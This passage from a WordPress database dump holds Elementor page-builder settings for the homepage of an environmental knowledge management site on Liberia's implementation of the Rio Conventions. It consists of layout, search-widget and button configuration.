center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#002600\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11407,1851,'_elementor_version','2.7.5'),(11408,1851,'_elementor_template_type','wp-page'),(11409,1851,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11412,1852,'_wp_page_template','default'),(11413,1852,'_elementor_edit_mode','builder'),(11414,1852,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[